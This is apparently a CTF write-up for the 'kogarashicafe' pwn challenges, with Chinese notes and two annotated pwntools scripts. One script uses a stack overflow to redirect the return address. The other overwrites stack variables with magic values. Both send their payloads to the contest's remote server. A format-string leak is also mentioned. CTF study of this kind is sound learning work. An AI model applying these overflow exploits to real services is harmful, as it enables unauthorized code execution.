apoorvctf_wp

kogarashicafe - the first

栈溢出 + 基本ROP

exp:

from pwn import *
import os
# Target is a 32-bit Linux binary; debug logging prints every byte exchanged.
context(arch='i386', os='linux', log_level='debug')

# pwntools uses context.terminal when it needs to spawn a terminal (e.g. for
# gdb.attach); inside a zellij session (presumably what ZELLIJ == "0" means)
# open a new pane to the right and run the command through bash.
if os.getenv("ZELLIJ") == "0":
    context.terminal = "zellij action new-pane -d right -c -- bash -c".split()

def main() -> None:
    """Overflow the first-visit prompt and return into a fixed in-binary address.

    This is the "栈溢出 + 基本ROP" challenge: the input is padded up to the
    saved return address, which is then replaced with the address of the
    target routine (presumably ``brew_coffee``, going by the variable name).
    Every address and offset below was taken from the challenge binary,
    which is not part of this page.
    """
    # Fixed 0x0804xxxx address: this only works because the binary is not
    # position independent — confirm with checksec on the challenge binary.
    addr_brew_coffee = 0x0804856B
    # Distance from the start of the buffer to the saved return address;
    # the "+ 4" presumably accounts for the saved ebp on i386 — verify
    # against the disassembly.
    offset = 0x28 + 4
    # Filler up to the return address, then the target packed little-endian.
    payload = b"A" * offset + p32(addr_brew_coffee)
    # r = process("./first_visit")
    r = remote("chals1.apoorvctf.xyz", 3001)
    # NOTE(review): the delimiter is a str; recent pwntools releases expect
    # bytes here and warn on str — switch to b"..." if that shows up.
    r.sendlineafter("Barista: 'What will you have?'", payload)    
    r.interactive()

# Run the exploit only when executed as a script, not when imported.
if __name__ == "__main__":
    main()

本地

远程

kogarashicafe - the secret

典型的格式化字符串漏洞——泄露内存


ASCII编码转换,ASCII码在线查询工具

关于字节、小端序、字长，还是需要再研究一下

kogarashicafe - the forbidden recipe

非常简单的栈溢出,入门级签到题

exp:

from pwn import *
import os
# 32-bit Linux target; log_level='debug' dumps every send/recv on the socket.
context(arch='i386', os='linux', log_level='debug')

# Terminal command pwntools runs when it needs a new window (e.g. gdb.attach).
# Only set inside a zellij session, which presumably exports ZELLIJ="0".
if os.getenv("ZELLIJ") == "0":
    pane_cmd = ["zellij", "action", "new-pane"]
    pane_cmd += ["-d", "right", "-c"]
    pane_cmd += ["--", "bash", "-c"]
    context.terminal = pane_cmd


def main() -> None:
    """Overflow the stack so two local variables take the values the binary checks.

    Going by the variable names and the page's description ("非常简单的栈溢出"),
    this presumably overwrites two stack locals rather than the return
    address. The offset and the two constants were taken from the challenge
    binary, which is not part of this page.
    """
    # Filler between the start of the buffer and the first overwritten local.
    offset = 0x20
    # -557122643 viewed as unsigned 32-bit is 0xDECAFBAD; the mask is needed
    # because p32() in its default unsigned mode does not accept a negative int.
    var_v2 = -557122643 & 0xFFFFFFFF
    # 12648243 == 0xC0FF33.
    var_v3 = 12648243
    # Filler, then both constants little-endian in the order they sit on the stack.
    payload = b'A' * offset + p32(var_v2) + p32(var_v3)
    # nc chals1.apoorvctf.xyz 3002
    r = remote("chals1.apoorvctf.xyz", 3002)
    # r = process("./forbidden_recipe")
    # NOTE(review): str delimiter — recent pwntools releases expect bytes here
    # and warn on str; use b"..." if that happens.
    r.sendlineafter("Barista: 'I remember you... what will it be this time?'\n", payload)
    r.interactive()

# Run the exploit only when executed as a script, not when imported.
if __name__ == "__main__":
    main()
